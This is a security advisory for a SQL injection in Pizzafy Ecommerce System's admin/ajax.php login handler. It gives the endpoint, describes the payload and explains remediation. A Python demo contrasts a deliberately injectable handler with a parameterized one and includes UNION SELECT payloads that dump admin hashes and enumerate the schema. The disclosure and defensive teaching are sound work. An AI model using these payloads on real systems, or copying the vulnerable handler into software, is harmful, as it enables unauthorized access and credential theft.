SourceCodester Pizzafy Ecommerce System SQL Injection Vulnerability
Vulnerability
A critical SQL injection vulnerability has been identified in SourceCodester Pizzafy Ecommerce System version 1.0. The flaw is in the login2 function of admin/ajax.php, which passes the 'email' parameter into a database query without sanitization or parameterization. Because the injection point is the login handler itself, a remote attacker can alter the structure of the SQL executed by the application before authenticating. The vulnerability has been publicly disclosed and no patch is available.
Impact
Exploitation allows error-based SQL injection (and, as the reproduction below shows, UNION-based extraction): an attacker can enumerate database names, table names and column structures, and read usernames and password hashes. Since the injected statements run with the application's database privileges, records can also be modified or deleted. Recovered administrator credentials or forged session data can then be used to obtain administrative access to the application.
Reproduction
To reproduce this vulnerability, send a POST request to '/pizzafy/admin/ajax.php?action=login2' with an injected SQL payload in the 'email' parameter, for example a closing quote followed by a UNION SELECT that returns the same number of columns as the original query and a trailing comment sequence to discard the rest of the statement. The 'password' parameter can be filled with any value, as the injection occurs entirely through the 'email' parameter and the comment neutralizes the password condition.
Remediation
The root cause is fixed by rewriting the login2 query (and any other query in admin/ajax.php built by string concatenation) as a prepared statement with bound parameters, so the submitted value is handled as data and can never change the structure of the SQL. Validating the 'email' parameter (for example, rejecting values that are not syntactically an e-mail address) is a useful second layer but not a substitute for parameterization. In addition, run the application with a database account limited to the tables and operations it needs, return a generic error to the client while logging the actual database error server-side so that error-based extraction has no channel, and monitor login requests for anomalous patterns.
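As an added illustration for the Reproduction and Remediation sections (not Pizzafy's code, which this page does not reproduce), the Python below models the flaw: a login handler that splices the submitted email into its SQL text, the UNION SELECT payload that turns it into an authentication bypass and data dump, the raw-error echo that enables error-based extraction, and the same handler rewritten with a prepared statement. The users table, its rows, the MD5 scheme, the handler names and the sqlite3 backend are all constructed for the demo; the real application uses MySQL, where schema enumeration would target information_schema rather than sqlite_master.

```python
import hashlib
import sqlite3

# Constructed fixture: a stand-in for the application's user table. Column names,
# rows and the hashing scheme are assumptions for this demo, not Pizzafy's schema.
ADMIN_EMAIL = "admin@example.com"
ADMIN_PASSWORD = "S3cret!"


def md5_hex(password: str) -> str:
    # MD5 mirrors what many PHP/MySQL hobby apps store; real code should use a
    # slow password hash (bcrypt/argon2). The hash scheme is incidental to the injection.
    return hashlib.md5(password.encode()).hexdigest()


def make_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE users (id INTEGER PRIMARY KEY, email TEXT, password TEXT, role TEXT)"
    )
    conn.execute(
        "INSERT INTO users (email, password, role) VALUES (?, ?, ?)",
        (ADMIN_EMAIL, md5_hex(ADMIN_PASSWORD), "admin"),
    )
    conn.commit()
    return conn


def ajax_login2_vulnerable(conn: sqlite3.Connection, form: dict) -> dict:
    """Model of the flawed handler: the email value is spliced into the SQL text."""
    email = form.get("email", "")
    pw_hash = md5_hex(form.get("password", ""))
    query = (
        "SELECT id, email, password, role FROM users "
        f"WHERE email = '{email}' AND password = '{pw_hash}'"
    )
    try:
        row = conn.execute(query).fetchone()
    except sqlite3.Error as exc:
        # Echoing the driver's message to the client is the leak that
        # error-based extraction relies on.
        return {"status": "error", "msg": str(exc)}
    if row is None:
        return {"status": "failed"}
    return {"status": "success", "user": row}


def ajax_login2_safe(conn: sqlite3.Connection, form: dict) -> dict:
    """Same handler with a prepared statement: email is bound as data, never parsed as SQL."""
    email = form.get("email", "")
    pw_hash = md5_hex(form.get("password", ""))
    try:
        row = conn.execute(
            "SELECT id, email, password, role FROM users WHERE email = ? AND password = ?",
            (email, pw_hash),
        ).fetchone()
    except sqlite3.Error:
        # Log server-side; the client gets a fixed message with no database detail.
        return {"status": "error", "msg": "login unavailable"}
    if row is None:
        return {"status": "failed"}
    return {"status": "success", "user": row}


# Payloads for the 'email' field. The UNION must supply the same number of
# columns (4) as the original SELECT; the trailing comment discards the rest of
# the statement, which is why the 'password' field can hold any value.
PAYLOAD_DUMP_ADMIN = "' UNION SELECT id, email, password, role FROM users WHERE role='admin'-- "
# Schema enumeration: sqlite_master here, information_schema.columns on MySQL.
PAYLOAD_SCHEMA = "' UNION SELECT 1, name, sql, 'x' FROM sqlite_master-- "
PAYLOAD_BREAK_SYNTAX = "'"


def demo() -> dict:
    """Run every payload against both handlers; returns the results keyed by case."""
    conn = make_db()
    cases = {
        "dump_admin": {"email": PAYLOAD_DUMP_ADMIN, "password": "anything"},
        "schema": {"email": PAYLOAD_SCHEMA, "password": "anything"},
        "syntax_error": {"email": PAYLOAD_BREAK_SYNTAX, "password": "anything"},
        "legit": {"email": ADMIN_EMAIL, "password": ADMIN_PASSWORD},
    }
    return {
        name: {
            "vulnerable": ajax_login2_vulnerable(conn, form),
            "safe": ajax_login2_safe(conn, form),
        }
        for name, form in cases.items()
    }


if __name__ == "__main__":
    for name, outcome in demo().items():
        print(f"{name:13} vulnerable -> {outcome['vulnerable']}")
        print(f"{'':13} safe       -> {outcome['safe']}")
```

Against the vulnerable handler the first payload logs in as the administrator and returns the stored password hash without knowing the password, the second returns the CREATE TABLE text of the users table, and a lone quote produces a raw parser error in the response. The parameterized handler treats all three as ordinary, non-matching e-mail addresses and only the genuine credentials succeed.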
